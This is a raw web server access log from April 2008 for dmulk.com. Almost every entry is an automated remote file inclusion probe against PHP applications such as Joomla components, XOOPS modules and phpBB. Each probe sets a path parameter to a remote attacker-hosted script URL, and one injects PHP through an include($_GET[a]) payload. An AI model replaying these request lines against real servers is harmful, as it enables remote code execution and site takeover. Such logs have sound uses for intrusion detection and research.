62.65.34.76 - - [23/Apr/2008:09:15:15 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.babyandtoddlerville.com/home/modules/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [23/Apr/2008:09:15:15 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.babyandtoddlerville.com/home/modules/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.151.96.6 - - [23/Apr/2008:09:15:19 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.10.144 - - [23/Apr/2008:09:15:35 -0700] "GET /logs//forums?forum=http://www.gibleder04.de/images/zoom/OLTAXH/viewsize/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
204.15.10.144 - - [23/Apr/2008:09:15:39 -0700] "GET //forums?forum=http://www.gibleder04.de/images/zoom/OLTAXH/viewsize/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:09:15:43 -0700] "GET /logs/access_080312.log/modules/news/?xoopsOption[pagetype]=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:09:15:43 -0700] "GET /modules/news/?xoopsOption[pagetype]=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:09:15:43 -0700] "GET /logs/modules/news/?xoopsOption[pagetype]=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.10.144 - - [23/Apr/2008:09:15:49 -0700] "GET /logs/Commence/user/phase/phase3.php?php_root_path=http://www.gibleder04.de/images/zoom/OLTAXH/viewsize/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
204.15.10.144 - - [23/Apr/2008:09:15:51 -0700] "GET /Commence/user/phase/phase3.php?php_root_path=http://www.gibleder04.de/images/zoom/OLTAXH/viewsize/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:17:31 -0700] "GET /logs/access_080228.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:17:31 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.161.41.3 - - [23/Apr/2008:09:18:02 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.41.3 - - [23/Apr/2008:09:18:05 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.41.3 - - [23/Apr/2008:09:18:06 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.65.34.76 - - [23/Apr/2008:09:18:30 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.babyandtoddlerville.com/home/modules/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [23/Apr/2008:09:18:31 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.babyandtoddlerville.com/home/modules/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [23/Apr/2008:09:18:31 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.babyandtoddlerville.com/home/modules/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [23/Apr/2008:09:18:31 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.babyandtoddlerville.com/home/modules/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [23/Apr/2008:09:18:32 -0700] "GET /logs/access_080308.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.babyandtoddlerville.com/home/modules/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [23/Apr/2008:09:18:32 -0700] "GET /logs/access_080308.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.babyandtoddlerville.com/home/modules/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.161.41.3 - - [23/Apr/2008:09:19:23 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:19:57 -0700] "GET /admin/index.php?o=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.109.167.35 - - [23/Apr/2008:09:20:07 -0700] "GET /logs/access_080218.log/////?mosConfig_absolute_path=http://www.animacartoon.altervista.org/cartella03/324235/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:09:20:09 -0700] "GET /mcf.php?content=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
86.109.167.35 - - [23/Apr/2008:09:20:10 -0700] "GET /////?mosConfig_absolute_path=http://www.animacartoon.altervista.org/cartella03/324235/index.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:09:20:11 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:09:20:11 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.109.167.35 - - [23/Apr/2008:09:20:11 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.animacartoon.altervista.org/cartella03/324235/index.txt? HTTP/1.1" 200 44418 "-" "libwww-perl/5.79" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:09:20:11 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.157.101 - - [23/Apr/2008:09:20:59 -0700] "GET /logs/access_080218.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:21:11 -0700] "GET /admin/index.php?o=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.151.96.6 - - [23/Apr/2008:09:21:36 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.168.161.227 - - [23/Apr/2008:09:22:19 -0700] "GET /logs/access_080218.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:22:24 -0700] "GET /logs/access_080117.log/admin/index.php?o=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:22:24 -0700] "GET /logs/admin/index.php?o=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.151.96.6 - - [23/Apr/2008:09:22:28 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.7.82 - - [23/Apr/2008:09:22:42 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/elmaalia/famili.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.7.82 - - [23/Apr/2008:09:22:42 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/elmaalia/famili.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.7.82 - - [23/Apr/2008:09:22:43 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/elmaalia/famili.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [23/Apr/2008:09:23:07 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.7.82 - - [23/Apr/2008:09:23:24 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/elmaalia/famili.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.179.180.45 - - [23/Apr/2008:09:23:33 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "www.dmulk.com"
202.179.180.45 - - [23/Apr/2008:09:23:37 -0700] "GET / HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:23:38 -0700] "GET /logs/access_080117.log/admin/index.php?o=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:23:38 -0700] "GET /logs/admin/index.php?o=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.69.224.10 - - [23/Apr/2008:09:23:42 -0700] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.69.224.10 - - [23/Apr/2008:09:23:42 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.69.224.10 - - [23/Apr/2008:09:23:43 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:23:50 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:23:50 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:23:51 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.12.244.192 - - [23/Apr/2008:09:24:29 -0700] "GET /logs/access_080207.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.12.244.192 - - [23/Apr/2008:09:25:01 -0700] "GET /logs/access_071122.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.31.61.43 - - [23/Apr/2008:09:25:32 -0700] "GET /logs/access_080215.log/?.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.31.61.43 - - [23/Apr/2008:09:25:33 -0700] "GET /logs/?.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 200 44410 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:25:35 -0700] "GET /logs/access_080329.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:25:35 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
66.249.70.117 - - [23/Apr/2008:09:25:59 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:25:59 -0700] "GET /logs/access_080115.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.249.70.117 - - [23/Apr/2008:09:25:59 -0700] "GET /logs/access_080306.log HTTP/1.1" 200 1179648 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
69.20.5.26 - - [23/Apr/2008:09:26:11 -0700] "GET /logs/access_080207.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.5.26 - - [23/Apr/2008:09:26:13 -0700] "GET /logs/access_071122.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:26:39 -0700] "GET /logs/access_080320.log//atom.php5?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:26:39 -0700] "GET //atom.php5?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:26:39 -0700] "GET /logs//atom.php5?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:26:40 -0700] "GET /logs/access_080320.log//atom.php5?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:26:40 -0700] "GET //atom.php5?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:26:41 -0700] "GET /logs//atom.php5?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.11.67.242 - - [23/Apr/2008:09:26:42 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:27:00 -0700] "GET /logs/access_080320.log//atom.php5?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:27:00 -0700] "GET /logs/access_080320.log//atom.php5?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:27:01 -0700] "GET //atom.php5?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:27:01 -0700] "GET //atom.php5?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:27:01 -0700] "GET /logs//atom.php5?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:27:01 -0700] "GET /logs//atom.php5?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:09:27:17 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.121.115.49 - - [23/Apr/2008:09:27:47 -0700] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [23/Apr/2008:09:27:48 -0700] "GET //skin/zero_vote/error.php?dir=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.42.133.2 - - [23/Apr/2008:09:27:48 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.115.49 - - [23/Apr/2008:09:27:48 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.42.133.2 - - [23/Apr/2008:09:27:48 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [23/Apr/2008:09:27:49 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.54.129.234 - - [23/Apr/2008:09:27:57 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
72.54.129.234 - - [23/Apr/2008:09:27:57 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
205.234.193.164 - - [23/Apr/2008:09:28:00 -0700] "GET /logs/access_080308.log/mcf.php?content=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:09:28:00 -0700] "GET /logs/mcf.php?content=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.54.129.234 - - [23/Apr/2008:09:28:33 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.54.129.234 - - [23/Apr/2008:09:28:34 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.54.129.234 - - [23/Apr/2008:09:28:34 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:28:44 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:28:44 -0700] "GET /modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:28:44 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:09:28:47 -0700] "GET /logs/access_080117.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:09:28:47 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:09:28:47 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:09:28:48 -0700] "GET /logs/access_080228.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:28:49 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:28:50 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:28:50 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:28:51 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
216.86.36.58 - - [23/Apr/2008:09:28:52 -0700] "GET /logs/access_080218.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://punkrawkmusic.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.175.3 - - [23/Apr/2008:09:29:18 -0700] "GET /logs/access_080308.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:29:23 -0700] "GET /logs/access_080315.log//atom.php5?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.87.175.3 - - [23/Apr/2008:09:29:24 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.175.3 - - [23/Apr/2008:09:29:24 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:29:24 -0700] "GET /logs/access_080315.log//atom.php5?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:29:25 -0700] "GET /logs/access_080315.log//atom.php5?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [23/Apr/2008:09:29:26 -0700] "GET /logs/access_080315.log//atom.php5?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.95.221.212 - - [23/Apr/2008:09:30:02 -0700] "GET /logs/access_080218.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
